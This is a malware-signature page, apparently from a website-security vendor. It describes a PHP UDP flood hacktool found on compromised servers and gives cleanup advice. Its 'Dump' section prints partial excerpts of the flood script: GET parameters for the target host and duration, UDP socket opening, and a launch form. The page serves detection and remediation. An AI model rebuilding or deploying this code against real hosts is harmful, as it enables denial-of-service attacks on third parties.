Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.hacktool.udpflood.001

php.hacktool.udpflood.001

UDP Flood attacks are a subtype of Denial of Service attacks (DoS) that works via UDP (User Datagram Protocol) protocol. Such attack can be used to disturb rivals or competitors. They are especially dangerous in their
distributed form when several servers symoultaneously flood one victim server with tons of requests making it unreachable by its normal users. Hacked servers are ideal platforms for such DDoS attack as they provide good level of anonymity
and at the same time have very fast Internet connections. Every now and then we find various specialized DoS tools (including UDP flood scripts) on hacked servers.

Affecting

Any servers with enabled PHP

Cleanup

Delete the malicious script and scan your server for other types of malware and specifically for backdoors.
You can also sign up with us and let our team remove the malware for you.

Dump

...excerpts from typical UDP Flood scripts...

<html>
<body>
<title>
H1t th4t m0th4 fuck4 tr0ll - Easy™
</title>
<font color="45acf6">

<center><b>
You See That Motha Fucking Troll, N' You Wanna Punch Him Some Lov3, HIT THAT MOTHA FUCKING TROLL!
</center></b>

...

if(isset($_GET['host'])&&isset($_GET['time'])){
$packets = 0;
ignore_user_abort(TRUE);
set_time_limit(0);

$exec_time = $_GET['time'];

$time = time();
//print "Started: ".time('d-m-y h:i:s')."<br>";
$max_time = $time+$exec_time;

$host = $_GET['host'];

...

$rand = rand(1,65000);
$fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);

...

echo "<b>UDP Flood</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second n";
echo '<br><br>
<form action="'.$surl.'" method=GET>
<input type="hidden" name="act" value="phptools">
Host: <br><input type=text name=host><br>
Length (seconds): <br><input type=text name=time><br>
<input type=submit value=Go></form>';
}else{ echo '<br><b>UDP Flood</b><br>
<form action=? method=GET>
<input type="hidden" name="act" value="phptools">
Host: <br><input type=text name=host value=><br>
Length (seconds): <br><input type=text name=time value=><br><br>
<input type=submit value=Go></form>';

...